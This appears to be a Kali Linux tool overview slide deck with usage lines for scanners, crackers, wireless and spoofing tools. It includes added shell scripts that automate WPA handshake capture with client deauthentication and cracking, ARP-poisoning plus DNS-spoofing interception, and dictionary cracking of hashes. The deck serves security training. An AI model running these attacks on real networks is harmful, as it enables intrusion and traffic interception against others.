Kali Linux useful tools
- 4. There are several categories
Top 10 Security Tools
Information Gathering
Vulnerability Analysis
Web Applications / Password Attacks
Wireless Attacks / Exploitation Tools
Sniffing/Spoofing / Maintaining Access
Reverse Engineering
Stress Testing / Hardware Hacking
Forensics / Reporting Tools
System Services
Information Gathering: this menu contains the tools for collecting information about the target.
Vulnerability Analysis: here the tools for analysing vulnerabilities are grouped.
Web Applications: the tools for penetration testing web-based applications are placed in this menu.
Password Attacks: this menu contains the tools for cracking passwords.
Wireless Attacks: the tools for attacks on wireless networks are collected here.
Exploitation Tools: here are the tools for running exploit code against a target.
Sniffing/Spoofing: this menu contains the tools for eavesdropping on and forging network traffic.
Maintaining Access: this menu contains the tools for keeping the access gained during the penetration stages.
Reverse Engineering: contains the tools for performing reverse engineering.
Stress Testing: the tools for load testing are found in this menu.
Hardware Hacking: this menu contains the tools for attacking Arduino-based systems.
Forensics: this section holds the tools for forensic investigation.
Reporting Tools: this menu contains the tools for report generation and evidence collection.
- 6. Information Gathering Tools
NMAP and ZenMAP
Nmap is one of the most powerful scanners for discovering open ports. It comes in two forms, a command-line tool for the terminal and a graphical front end; the zenmap command opens the graphical interface.
nmap -p0-65535 <Target IP> (scan every port from 0 to 65535; -p- is the shorthand for 1-65535, port 0 has to be named explicitly)
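The following is an added example, not from the original deck and not part of nmap: a wrapper that runs the slide's full-range scan with version detection, saves grepable output (-oG) and extracts the open ports per host with awk, so the result can be fed to the other tools on these slides. The sample grepable output is constructed here to exercise the parser offline; 192.0.2.10 and 192.0.2.11 are documentation addresses used as placeholders, and scan.gnmap is a placeholder file name.

```shell
#!/bin/sh
# Added example (not from the original deck). Runs nmap with grepable output
# and turns its "Host: ... Ports: ..." lines into a tab-separated list of open
# ports. 192.0.2.10/11 are documentation addresses used as placeholders.

# Parse nmap -oG output from stdin and print "host<TAB>port/proto/service"
# for every port nmap reported as open. Grepable lines are tab-separated:
#   Host: 192.0.2.10 ()<TAB>Ports: 22/open/tcp//ssh//OpenSSH 8.9/, ...<TAB>Ignored State: ...
# and each port entry is port/state/protocol/owner/service/rpc/version.
open_ports_from_gnmap() {
    awk -F'\t' '
        /^Host:/ && /\tPorts:/ {
            split($1, h, " ")                      # h[2] is the IP address
            for (i = 2; i <= NF; i++) {
                if ($i ~ /^Ports: /) {
                    sub(/^Ports: /, "", $i)
                    n = split($i, p, ", ")
                    for (j = 1; j <= n; j++) {
                        split(p[j], f, "/")
                        if (f[2] == "open")
                            printf "%s\t%s/%s/%s\n", h[2], f[1], f[3], f[5]
                    }
                }
            }
        }'
}

# Run the slide's full-range scan (port 0 included; -p- would be 1-65535)
# with version detection and summarise it. Needs nmap and, for SYN scans, root.
full_scan() {  # $1 = target host or network
    nmap -sV -p0-65535 -oG scan.gnmap "$1" >/dev/null
    open_ports_from_gnmap < scan.gnmap
}

# Constructed sample of grepable output so the parser can be exercised offline.
sample_gnmap() {
    printf 'Host: 192.0.2.10 ()\tStatus: Up\n'
    printf 'Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9/, 80/open/tcp//http//nginx 1.18/, 443/filtered/tcp//https///\tIgnored State: closed (65533)\n'
    printf 'Host: 192.0.2.11 ()\tPorts: 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (65535)\n'
}

# Stand-alone run: parse the constructed sample (full_scan is only called on demand).
sample_gnmap | open_ports_from_gnmap
```

Filtered and closed ports are dropped on purpose: only "open" entries are worth handing to a service-specific tool, and the version column (f[7]) is where a searchsploit query would start.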
- 7. dnsenum
dnsenum gathers as much information as possible about a domain: host addresses, name servers, MX records, zone transfer attempts, search-engine scraping and wordlist-based subdomain brute forcing.
USAGE : dnsenum.pl [options] <domain>
EXAMPLE : ./dnsenum.pl -p 1 -s 1 google.com
- 8. dnsmap
dnsmap discovers subdomains associated with a given domain by brute forcing names from a built-in or user-supplied wordlist.
USAGE: ./dnsmap <target-domain> [options]
EXAMPLE: ./dnsmap google.com
- 10. wafw00f
wafw00f detects Web Application Firewalls (WAFs) in front of a site through stimulus/response testing: it sends normal and deliberately malicious requests and looks for the response codes, headers and cookies that identify specific WAF products.
USAGE: wafw00f <url> (older releases were run as python wafw00f.py <url>)
EXAMPLE: wafw00f https://google.com
- 11. arping
arping pings a destination by sending ARP
REQUEST packets to a neighbour host
USAGE: arping [-fqbDUAV] [-c count] [-w timeout] [-I device] [-s source] destination
EXAMPLE: arping -f -c 1 -I wlan0 192.168.100.1 (-f stops after the first reply; a live host yields "Received 1 response(s)")
- 14. Netcat
Netcat (here the Nmap project's ncat) is a general-purpose command-line tool for reading, writing, redirecting and encrypting data across a network. It aims to be your network Swiss Army knife, handling a wide variety of security testing and administration tasks.
USAGE: ncat [options] [hostname] [port]
EXAMPLE: ncat -C mail.example.com 25 (talk to an SMTP server by hand; -C sends CRLF line endings as SMTP requires; read the manual for the rest of the dialogue)
EXAMPLE: ncat -l localhost 143 --sh-exec "ncat --ssl imap.example.com 993" (a local plain-text listener on port 143 that wraps each connection in SSL to an IMAP server, for clients that cannot speak TLS themselves)
- 16. intrace
InTrace is a traceroute-like application that enumerates IP hops by exploiting an existing TCP connection, whether initiated locally or by a remote host. It is useful for network reconnaissance and for tracing through firewalls that drop ordinary traceroute probes.
USAGE: intrace -h <hostname> [options]
EXAMPLE: ./intrace -h www.freescale.com (then open a TCP connection to that host, e.g. with a browser, and InTrace traces along it)
- 17. sslscan
SSLScan queries an SSL/TLS service to list the protocol versions and cipher suites it accepts and shows the server certificate, flagging weak options.
USAGE: sslscan [Options] [host:port | host]
EXAMPLE: sslscan 209.85.146.17
- 18. tlssled
TLSSLed is a Linux shell script whose purpose is to evaluate the security of a target SSL/TLS (HTTPS) web server implementation. It is based on sslscan and openssl s_client.
USAGE: TLSSLed.sh <hostname> <port>
EXAMPLE: ./TLSSLed.sh www.owasp.org 443
- 19. cisco-auditing-tool
Cisco Auditing Tool (CAT) is a Perl script that scans Cisco routers for common weaknesses: default passwords, easily guessable SNMP community names and the IOS history bug.
USAGE: ./CAT [options]
- 20. ssldump
ssldump is a network protocol analyser specialised for SSLv3/TLS: it decodes the handshake records on a live interface or in a capture file and, given the server's private key (RSA key exchange only), can decrypt the application data.
EXAMPLE: ssldump -i eth0 port 443 (listen to traffic on interface eth0 port 443)
- 21. sslstrip
sslstrip implements the HTTPS stripping attack. It transparently hijacks HTTP traffic on a network (the attacker must already be in the path, e.g. via ARP spoofing plus an iptables redirect of port 80 to the listen port), watches for HTTPS links and redirects, and maps them to look-alike HTTP links so the victim never upgrades to TLS. Sites on the HSTS preload list are immune.
USAGE: sslstrip -l <listenPort>
- 22. cdpsnarf
CDPSnarf is a network sniffer written exclusively to extract information from CDP (Cisco Discovery Protocol) packets: device IDs, IOS versions, platform, VLAN and address details that Cisco gear announces on the local segment every 60 seconds by default.
USAGE: cdpsnarf -i <device>
EXAMPLE: ./cdpsnarf -i eth2
- 26. oscanner
Oscanner is an Oracle assessment
framework developed in Java.
USAGE: oscanner -s <ip> -r <repfile> [options]
EXAMPLE: oscanner.sh -s 192.168.0.1
- 28. sqlninja
Sqlninja is a tool targeted at exploiting SQL injection vulnerabilities in web applications that use Microsoft SQL Server as their back end, up to taking over the database host.
http://sqlninja.sourceforge.net/sqlninja-howto.html
- 29. FUZZING TOOLS
Bed
BED (aka Bruteforce Exploit Detector) is a plain-text protocol
fuzzer that checks software for common vulnerabilities like
buffer overflows, format string bugs, integer overflows, etc.
The tool currently supports following protocols: finger, ftp,
http, imap, irc, lpd, pjl, pop, smtp
USAGE: ./bed.pl -s <plugin> [options]
EXAMPLE: ./bed.pl -s HTTP -t 192.168.100.16 -p 80
- 30. powerfuzzer
Powerfuzzer is a highly automated and fully customizable web
fuzzer (HTTP protocol based application fuzzer)
- Cross Site Scripting (XSS)
- Injections (SQL, LDAP, code, commands, and XPATH)
- CRLF
- 31. nikto
Nikto is a web server scanner: it tests for thousands of potentially dangerous files and CGIs, outdated server software and version-specific problems.
USAGE: nikto -h <host> [options]
http://cirt.net/nikto2-docs/options.html
- 32. WEB APPLICATIONS: CMS IDENTIFICATION
WPScan is a black box WordPress vulnerability scanner (version, plugins, themes, users and known vulnerabilities).
USAGE: wpscan --url <target url> [options] (older releases: wpscan.rb --url ...)
OPTIONS http://wpscan.org/
- 34. webslayer
WebSlayer is a tool designed for brute forcing web applications: it can discover unlinked resources (directories, servlets, scripts, etc.), brute force GET and POST parameters, brute force form parameters (user/password), fuzz inputs, and so on.
USAGE: GUI tool
More info:
https://www.owasp.org/index.php/Category:OWASP_Webslayer_Project
- 35. websploit
WebSploit is used to scan and analyse remote systems in order to find various types of vulnerabilities. It covers scanning, crawling and web analysis, automatic exploitation and network attacks.
USAGE: interactive console (run websploit and pick a module)
- 36. xsser
Cross Site "Scripter" (aka XSSer) is an
automatic -framework- to detect, exploit
and report XSS vulnerabilities in web-
based applications.
USAGE: xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]
EXAMPLE: python xsser.py -u http://host.com (Simple injection from URL)
- 37. zaproxy
The OWASP Zed Attack Proxy (ZAP) is an easy to use
integrated penetration testing tool for finding
vulnerabilities in web applications.
USAGE: GUI tool
https://code.google.com/p/zaproxy/
- 38. Vega
Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL injection, cross-site scripting (XSS), inadvertently disclosed sensitive information and other vulnerabilities.
USAGE: GUI tool
- 39. dirb
DIRB is a web content scanner. It looks for existing (and/or hidden) web objects by launching dictionary-based requests against the web server and comparing the responses.
USAGE: dirb <url_base> [<wordlist_file(s)>] [options]
- 40. grabber
Grabber is a web application scanner. Basically it
detects some kind of vulnerabilities in your website.
Features
Cross-Site Scripting
SQL Injection (there is also a special Blind SQL Injection module)
File Inclusion
Backup files check
Simple AJAX check
USAGE: grabber.py [options]
- 41. joomscan
joomscan detects file inclusion, SQL injection, command
execution vulnerabilities of a target Joomla! web site.
USAGE: joomscan.pl -u <string> -x proxy:port
https://www.owasp.org/index.php/OWASP_Joomla_Vulnerability_Scanner_Usage
- 42. w3af
w3af is a Web Application Attack and Audit Framework. It finds vulnerabilities such as (blind) SQL injection, OS commanding, remote file inclusion (PHP), cross-site scripting (XSS) and unsafe file uploads, and can exploit them to gain different types of access.
More info: http://w3af.org/
USAGE: GUI tool (w3af_gui) or console (w3af_console)
- 43. cmospwd
CmosPwd is a cmos/bios password recovery tool.
More info: http://www.cgsecurity.org/cmospwd.txt
USAGE: cmospwd [/d]
- 44. crunch
crunch is a tool for creating bruteforce wordlists which can be
used to audit password strength.
USAGE: crunch <min-len> <max-len> [charset] [options]
EXAMPLE: ./crunch 6 6 0123456789ABCDEF
- 45. Hashcat
Hashcat is a very fast password recovery (hash cracking) tool. The version in this deck is the CPU-based one; its GPU sibling oclHashcat was later merged into it, so current releases crack on GPUs as well.
USAGE : hashcat [options] hashfile [mask|wordfiles|directories]
OPTIONS: http://hashcat.net/wiki/doku.php?id=hashcat
- 46. hash-identifier
hash-identifier is a script that identifies the different types of hashes used to protect data, especially passwords, from their length and character set. Because several algorithms share a length, it reports a list of candidates.
EXAMPLE:
python ./Hash_ID_v1.1.py
Submit your hash:
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 (64 hex characters, reported as SHA-256; this is the SHA-256 of the empty string)
- 47. john the ripper
John the Ripper (JTR) is a free password cracking tool. It is one of the most popular password testing and breaking programs and auto-detects most hash formats (crypt(3), LM/NTLM, raw MD5/SHA and many more).
USAGE: john [OPTIONS] [PASSWORD-FILES]
Example:
john --single crackme.txt (single crack mode: derives candidates from the user names and GECOS fields)
john --wordlist=password.lst crackme.txt (dictionary attack; add --rules for word mangling)
john --show crackme.txt (print the passwords already cracked and stored in john.pot)
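The hash-identifier and John the Ripper slides describe two steps of one job: work out what kind of hash you hold, then test candidates against it. The following is an added example, not from the original deck and not code from either tool: it guesses the algorithm family from the digest length the way hash-identifier does, then runs a plain dictionary attack with coreutils the way john --wordlist or hashcat -a 0 would. The wordlist is constructed here; the two target digests are the MD5 and SHA-256 of "password", and the first hash is the one from the hash-identifier slide (SHA-256 of the empty string).

```shell
#!/bin/sh
# Added example (not from the original deck): hash type guessing plus a
# dictionary attack done with coreutils, to show what john/hashcat automate.

# Guess the algorithm family of an unsalted hex digest from its length.
# Several algorithms share a length (MD5 and NTLM are both 32 hex chars),
# so the result is a candidate list, not a certainty.
guess_hash_type() {  # $1 = hex digest
    h=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    case "$h" in
        *[!0-9a-f]*) echo "not a plain hex digest"; return 1 ;;
    esac
    case ${#h} in
        32)  echo "MD5 / NTLM / MD4 (32 hex)" ;;
        40)  echo "SHA-1 / RIPEMD-160 (40 hex)" ;;
        64)  echo "SHA-256 / SHA3-256 (64 hex)" ;;
        128) echo "SHA-512 / SHA3-512 (128 hex)" ;;
        *)   echo "unknown length ${#h}" ;;
    esac
}

# Hash one candidate with the named coreutils tool (md5sum, sha256sum, ...).
# printf '%s' avoids hashing a trailing newline, the classic mistake.
digest() {  # $1 = tool, $2 = candidate
    printf '%s' "$2" | "$1" | cut -d' ' -f1
}

# Dictionary attack: hash every word in the wordlist and compare with the
# target. Prints the recovered plaintext and returns 0, or 1 if exhausted.
crack_hash() {  # $1 = target hex digest, $2 = wordlist file
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    case ${#target} in
        32)  tool=md5sum ;;
        40)  tool=sha1sum ;;
        64)  tool=sha256sum ;;
        128) tool=sha512sum ;;
        *)   return 1 ;;
    esac
    while IFS= read -r word || [ -n "$word" ]; do
        if [ "$(digest "$tool" "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# Constructed wordlist (the kind crunch or cewl would produce) for a stand-alone run.
WORDLIST=$(mktemp)
trap 'rm -f "$WORDLIST"' EXIT
printf '%s\n' 123456 letmein password qwerty > "$WORDLIST"

guess_hash_type e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
crack_hash 5f4dcc3b5aa765d61d8327deb882cf99 "$WORDLIST"                                  # MD5("password")
crack_hash 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8 "$WORDLIST"  # SHA-256("password")
```

Real password stores are usually salted (crypt(3) in /etc/shadow, bcrypt in web applications), so a length-only guess fails and every candidate has to be hashed together with the stored salt; john and hashcat recognise those formats and do exactly that, several orders of magnitude faster than a shell loop.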
- 48. ophcrack
Ophcrack is a free open source (GPL licensed) program
that cracks Windows passwords by using LM hashes
through rainbow tables.
USAGE: GUI tool
- 49. RainbowCrack
RainbowCrack is a program that generates rainbow tables and uses them in password cracking.
USAGE: rcrack <rainbow_table_path> -h <hash>
A rainbow table is a precomputed table for reversing a hash function. Such tables are used to crack hashed passwords; they only work against unsalted hashes, which is why tools like ophcrack target LM/NTLM.
- 50. cewl
CeWL is a Ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words that can be used as a wordlist for password crackers such as John the Ripper.
USAGE: cewl [OPTION] ... URL
OPTIONS: http://www.digininja.org/projects/cewl.php
- 51. Hydra
THC-Hydra is a very fast (multi-threaded) network logon cracker which supports many different services: afp, cisco, cisco-enable, cvs, firebird, ftp, http-get, http-head, http-proxy, https-get, https-head, https-form-get, https-form-post, icq, imap, imap-ntlm, ldap2, ldap3, mssql, mysql, ncp, nntp, oracle-listener, pcanywhere, pcnfs, pop3, pop3-ntlm, postgres, rexec, rlogin, rsh, sapr3, sip, smb, smbnt, smtp-auth, smtp-auth-ntlm, snmp, socks5, ssh2, svn, teamspeak, telnet, vmauthd, vnc.
USAGE: hydra [options] (-l <user> | -L <userfile>) (-p <pass> | -P <passfile>) <service>://<target>[:port]
OPTIONS http://www.aldeid.com/wiki/Thc-hydra#Usage
- 52. bluelog
Bluelog is a Bluetooth scanner designed to tell you how
many discoverable devices there are in an area as
quickly as possible.
USAGE: bluelog [options]
OPTIONS: https://github.com/MS3FGX/Bluelog
EXAMPLE: bluelog -vtn
- 53. bluemaho
BlueMaho is a GUI shell (interface) for a suite of tools for testing the security of Bluetooth devices. It is free, open source and written in Python.
More info: http://wiki.thc.org/BlueMaho
USAGE: GUI tool
- 54. RFID/NFC TOOLS: NFC TOOLS
nfc-list
nfc-list is a utility from libnfc, the library that gives userspace applications access to NFC readers; it lists the connected NFC devices and any tags currently in their field.
More info: http://nfc-tools.org/index.php?title=Main_Page
USAGE: nfc-list
- 55. WIRELESS TOOLS
Aircrack-ng
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program
that can recover keys once enough data packets have been captured.
More info: www.aircrack-ng.org
EXAMPLE: aircrack-ng -a 2 -w dictionary.txt handshake-01.cap
- 56. aireplay-ng
aireplay-ng is used to inject/replay frames. The primary
function is to generate traffic for the later use in aircrack-ng for
cracking the WEP and WPA-PSK keys.
USAGE: aireplay-ng [options] <replay interface>
- 57. airmon-ng
airmon-ng is a script that can be used to enable monitor mode on wireless interfaces.
USAGE: airmon-ng <start|stop> <interface> [channel]
EXAMPLE: airmon-ng start wlan0 (creates the monitor interface: mon0 on older releases, wlan0mon on current ones; the other aircrack-ng tools are then pointed at that interface)
- 58. airodump-ng
airodump-ng is used for packet capturing of raw 802.11
frames for the intent of using them with aircrack-ng.
USAGE: airodump-ng [options] <interface name>
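The four aircrack-ng slides above are the steps of one procedure: put the card in monitor mode, find the target, capture the WPA four-way handshake while forcing clients to reconnect, then attack it offline. The following is an added example, not from the original deck and not part of aircrack-ng: the whole workflow as one script, with a small parser for airodump-ng's CSV output that picks the target's BSSID and channel by ESSID. capture_and_crack needs root and a monitor-mode capable adapter; the CSV sample is constructed here so find_target can be run without hardware. The interface name wlan0, the ESSIDs and the MAC addresses are placeholders.

```shell
#!/bin/sh
# Added example (not from the original deck): the WPA-PSK handshake workflow
# built from airmon-ng, airodump-ng, aireplay-ng and aircrack-ng.
# capture_and_crack needs root and a monitor-mode adapter; find_target only
# needs awk and is demonstrated on a constructed CSV.

# Look up the BSSID and channel of an ESSID in airodump-ng's CSV output
# (written by airodump-ng -w <prefix> --output-format csv as <prefix>-01.csv).
# The access-point section has the columns
#   BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher,
#   Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
# and is followed by a "Station MAC, ..." client section, which we skip.
# Prints "BSSID CHANNEL"; returns 1 if the ESSID was not seen.
find_target() {  # $1 = csv file, $2 = ESSID
    awk -F', ' -v essid="$2" '
        /^Station MAC/ { exit }
        $1 ~ /^[0-9A-Fa-f:]+$/ && length($1) == 17 {
            gsub(/^ +| +$/, "", $14)
            if ($14 == essid) { print $1, $4 + 0; found = 1 }
        }
        END { exit found ? 0 : 1 }' "$1"
}

# Monitor interface name follows airmon-ng: wlan0 -> wlan0mon on current
# releases (older ones created mon0, as on the reaver slide).
capture_and_crack() {  # $1 = wireless interface, $2 = ESSID, $3 = wordlist
    iface=$1; essid=$2; wordlist=$3; mon="${iface}mon"
    airmon-ng check kill                       # stop NetworkManager/wpa_supplicant
    airmon-ng start "$iface"
    # 1. survey for 20 s to learn the target's BSSID and channel
    timeout 20 airodump-ng -w survey --output-format csv "$mon" || true
    target=$(find_target survey-01.csv "$essid") || { echo "ESSID $essid not seen" >&2; return 1; }
    bssid=${target% *}; chan=${target#* }
    # 2. capture only that AP on its channel, in the background
    airodump-ng -c "$chan" --bssid "$bssid" -w handshake "$mon" &
    dump=$!
    sleep 5
    # 3. deauthenticate clients; when they reconnect the 4-way handshake is captured
    aireplay-ng --deauth 5 -a "$bssid" "$mon"
    sleep 15
    kill "$dump"
    airmon-ng stop "$mon"
    # 4. offline dictionary attack on the captured handshake (slide 55's command)
    aircrack-ng -a 2 -b "$bssid" -w "$wordlist" handshake-01.cap
}

# Constructed airodump-ng CSV (not a real capture) for a stand-alone run.
sample_csv() {
    printf '\nBSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key\n'
    printf 'AA:BB:CC:DD:EE:FF, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,       12,        0,   0.  0.  0.  0,   8, CorpWifi, \n'
    printf '11:22:33:44:55:66, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -70,        5,        0,   0.  0.  0.  0,   5, Guest, \n'
    printf '\nStation MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs\n'
    printf 'DE:AD:BE:EF:00:01, 2024-01-01 10:01:00, 2024-01-01 10:04:00, -50,       30, AA:BB:CC:DD:EE:FF, CorpWifi\n'
}

SURVEY=$(mktemp)
sample_csv > "$SURVEY"
find_target "$SURVEY" CorpWifi     # AA:BB:CC:DD:EE:FF 6
```

Capturing on a single channel with --bssid matters: hopping across channels during the deauth burst is the usual reason the handshake is missed. coWPAtty (next slide) accepts the same handshake-01.cap as its -r argument.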
- 59. cowpatty
coWPAtty runs an offline dictionary attack against WPA-PSK using a captured four-way handshake; it can also use precomputed PMK tables (made with genpmk) for a given SSID.
USAGE: cowpatty [options]
OPTIONS :http://www.willhackforsushi.com/code/cowpatty/4.3/README
- 60. Fern Wifi Cracker
Fern Wifi Cracker is a Wireless security auditing and attack
software program that is able to crack and recover WEP/WPA/WPS
keys and also run other network based attacks on wireless or
Ethernet based networks.
More info: https://code.google.com/p/fern-wifi-cracker/
USAGE: GUI tool
- 61. Kismet
Kismet is an 802.11 layer2 wireless network detector,
sniffer, and intrusion detection system.
OPTIONS: http://www.irongeek.com/i.php?page=backtrack-r1-man-pages/kismet
- 62. wifi-honey
wifi-honey works out what encryption a client is looking for in
a given network by setting up four fake access points, each
with a different type of encryption - None, WEP, WPA and
WPA2 - and then observing which of the four the client
connects to.
USAGE: ./wifi_honey.sh <essid> <channel> <interface>
- 63. reaver
Reaver implements a brute force attack against
WiFi Protected Setup which can crack the WPS
pin of an access point
USAGE: reaver -i <interface> -b <target bssid> -vv
EXAMPLE: reaver -i mon0 -b 00:01:02:03:04:05
TIP https://code.google.com/p/reaver-wps/wiki/HintsAndTips
- 64. searchsploit
searchsploit - a shell script to search a local repository
of exploitdb
USAGE: searchsploit [term1] [term2] [term3]
EXAMPLE: searchsploit oracle windows local
- 66. darkstat
darkstat is a packet sniffer that runs as a background
process, gathers all sorts of statistics about network
usage, and serves them over HTTP.
OPTIONS :http://linux.die.net/man/8/darkstat
- 67. dnsspoof
dnsspoof forges replies to arbitrary DNS address (A) and pointer (PTR) queries on the LAN. This is useful for bypassing hostname-based access controls or for implementing a variety of man-in-the-middle attacks. It only sees the victim's queries once their traffic passes the attacker, which is what the arpspoof steps below arrange.
USAGE: dnsspoof [-i interface] [-f hostsfile] [expression]
EXAMPLE:
# echo 1 > /proc/sys/net/ipv4/ip_forward (enable IP forwarding so the victim keeps connectivity)
# arpspoof -t 192.168.1.245 192.168.1.5 & (tell the victim 192.168.1.245 that we are the gateway 192.168.1.5)
# arpspoof -t 192.168.1.5 192.168.1.245 & (tell the gateway that we are the victim)
# dnsspoof -f spoofhosts.txt host 192.168.1.245 and udp port 53
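The four commands on this slide are one procedure, so here it is as a single script, an added example that is not from the original deck or from dsniff: it builds the hosts file dnsspoof answers from, enables forwarding, starts both arpspoof directions, runs dnsspoof in the foreground and undoes the forwarding and spoofing on exit. The victim and gateway addresses are the slide's; the attacker address 192.168.1.66, the interface eth0 and the host names are placeholders. Running it needs root and the dsniff package; the hosts-file helper runs anywhere.

```shell
#!/bin/sh
# Added example (not from the original deck): the ARP + DNS spoofing steps from
# the slide as one script with cleanup. 192.168.1.245 (victim) and 192.168.1.5
# (gateway) come from the slide; 192.168.1.66 (attacker), eth0 and the host
# names are placeholders. Needs root and dsniff (arpspoof, dnsspoof).

# Write a dnsspoof hosts file: "IP<TAB>hostname" per line, wildcards allowed
# (e.g. *.example.net). Prints the number of entries written.
write_spoofhosts() {  # $1 = output file, $2 = IP to answer with, $3.. = host names
    out=$1; ip=$2; shift 2
    : > "$out"
    for name in "$@"; do
        printf '%s\t%s\n' "$ip" "$name" >> "$out"
    done
    wc -l < "$out" | tr -d ' '
}

# Undo what run_mitm changed: stop the spoofers and disable forwarding.
cleanup() {
    kill "$ARP1" "$ARP2" 2>/dev/null
    echo 0 > /proc/sys/net/ipv4/ip_forward
}

run_mitm() {  # $1 = victim IP, $2 = gateway IP, $3 = hosts file, $4 = interface
    victim=$1; gw=$2; hosts=$3; iface=$4
    echo 1 > /proc/sys/net/ipv4/ip_forward      # relay traffic or the victim goes offline
    trap cleanup EXIT INT TERM
    arpspoof -i "$iface" -t "$victim" "$gw" &   # tell the victim we are the gateway
    ARP1=$!
    arpspoof -i "$iface" -t "$gw" "$victim" &   # tell the gateway we are the victim
    ARP2=$!
    sleep 2                                     # let both ARP caches poison
    # answer DNS queries from the victim only, using our hosts file (foreground)
    dnsspoof -i "$iface" -f "$hosts" "host $victim and udp port 53"
}

HOSTS=$(mktemp)
write_spoofhosts "$HOSTS" 192.168.1.66 www.example.com '*.example.net'
cat "$HOSTS"

# Only run the attack when explicitly asked: sh this_script.sh --run
if [ "${1:-}" = "--run" ]; then
    run_mitm 192.168.1.245 192.168.1.5 "$HOSTS" eth0
fi
```

The BPF expression restricts dnsspoof to the victim's queries so the rest of the segment is not disturbed. Forged answers only pay off for plain HTTP or services without pinning; a browser that enforces HSTS for the spoofed name will refuse the attacker's certificate, which is why this is usually combined with sslstrip rather than used alone.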
- 68. Ettercap
Ettercap is a comprehensive suite for
man in the middle attacks.
More info:
http://ettercap.github.io/ettercap/
- 70. macchanger
macchanger is a Linux utility for viewing/manipulating
the MAC address for network interfaces.
USAGE: macchanger [options] device
EXAMPLE: macchanger eth1
EXAMPLE: macchanger --mac=01:23:45:67:89:AB eth1
- 72. iaxflood
IAXFlood is a tool for flooding the IAX2 protocol which is used by the Asterisk PBX.
USAGE: ./iaxflood sourcename destinationname numpackets
- 73. cymothoa
Cymothoa is a stealth backdooring tool that injects backdoor shellcode into an existing running process (via ptrace), so no new process or file on disk betrays it.
OPTIONS :http://cymothoa.sourceforge.net/
- 74. proxychains
proxychains - a tool that forces any TCP connection made by
any given application to follow through proxy like TOR or any
other SOCKS4, SOCKS5 or HTTP(S) proxy.
USAGE: proxychains command
EXAMPLE: proxychains telnet victim.com
- 76. jad
Jad (Java Decompiler) is a currently unmaintained
decompiler for the Java programming language.
- 77. apktool
Apktool decodes Android APKs (resources back to near-original form, Dalvik bytecode to smali) and rebuilds them after modification. It is a tool for reverse engineering.
- 78. JavaSnoop
JavaSnoop is a tool for testing (re: hacking) Java desktop
applications or applets.
More info: http://javasnoop.googlecode.com/svn-history/r32/trunk/resources/README.txt
USAGE: GUI tool
- 79. radare2
radare2, the reverse engineering framework, is an open source tool to disassemble, debug, analyze and manipulate binary files.
OPTIONS http://www.makelinux.net/man/1/R/radare2
- 80. macof
macof floods the local network with random MAC addresses
(causing some switches to fail open in repeating mode,
facilitating sniffing).
USAGE: macof [-i interface] [-s src] [-d dst] [-e tha] [-x sport] [-y dport] [-n times]
- 81. siege
siege - An HTTP/HTTPS stress tester.
Siege is a multi-threaded http load
testing and benchmarking utility.
USAGE: siege [options] [url]
OPTIONS: http://linux.die.net/man/1/siege
EXAMPLE: siege -c25 -t1M www.example.com
- 83. DIGITAL FORENSICS
bulk_extractor is a C++ program that scans a disk image, a file,
or a directory of files and extracts useful information without
parsing the file system or file system structures.
- 84. foremost
foremost recovers files from a disk image by carving on the headers and footers of the file types chosen with the -t switch. Supported: jpg, gif, png, bmp, avi, exe, mpg, wav, riff, wmv, mov, pdf, ole, doc, zip, rar, htm, cpp.
USAGE: foremost [-h][-V][-d][-vqwQT][-b<blocksize>][-o<dir>][-t<type>][-s<num>][-i<file>]
OPTIONS: http://manpages.ubuntu.com/manpages/hardy/en/man1/foremost.1.html
EXAMPLE: foremost -s 100 -t jpg -i image.dd (carve JPEG files, skipping the first 100 blocks of the image)
- 85. rahash2
rahash2 - radare tool for creating
hashes.
EXAMPLE: rahash2 -a md5 -s 'hello world'
- 86. References
http://www.aldeid.com
http://www.morningstarsecurity.com
http://www.hackingdna.com
http://zer0byte.com/2013/03/19/kali-linux-complete-tools-list-installation-screen-shots/
http://www.monkey.org/~dugsong/fragroute/
http://www.sans.org/security-resources/idfaq/fragroute.php
http://flylib.com/books/en/3.105.1.82/1/
http://www.darknet.org.uk/2008/04/cdpsnarf-cdp-packet-sniffer/
http://mateslab.weebly.com/dnmap-the-distributed-nmap.html
http://www.tuicool.com/articles/raimMz
http://backtrackwasneversoeasy.blogspot.co.uk/2012/02/terminating-internet-of-whole-network.html
http://www.ethicalhacker.net
http://nmap.org/ncat/guide/ncat-tricks.html
http://nixgeneration.com/~jaime/netdiscover/
http://csabyblog.blogspot.co.uk
http://thehackernews.com
https://code.google.com/p/wol-e/wiki/Help
http://linux.die.net/man/1/xprobe2
http://www.digininja.org/projects/twofi.php
https://code.google.com/p/intrace/wiki/intrace
https://github.com/iSECPartners/sslyze/wiki
http://www.securitytube-tools.net/index.php@title=Braa.html
http://security.radware.com
- 87. The way of the world is one
This is the right path